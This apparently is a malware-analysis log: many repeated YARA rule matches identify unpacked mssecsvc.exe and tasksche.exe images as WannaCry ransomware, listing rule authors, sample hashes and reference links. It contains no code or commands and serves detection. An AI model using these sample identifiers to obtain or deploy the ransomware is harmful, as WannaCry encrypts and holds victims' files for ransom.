                Source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.24f88e8.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.24f88e8.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.24ed8c8.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.1fd7104.4.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.1fd7104.4.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 8.2.mssecsvc.exe.1fd7104.4.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.1fd7104.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.1fd7104.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.24fc948.9.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.24fc948.9.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 9.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 10.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 10.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 10.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 7.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 7.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 7.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.1ffa128.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.1ffa128.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.2.mssecsvc.exe.1ffa128.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 8.2.mssecsvc.exe.24ed8c8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 8.2.mssecsvc.exe.24ed8c8.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 5.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 5.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
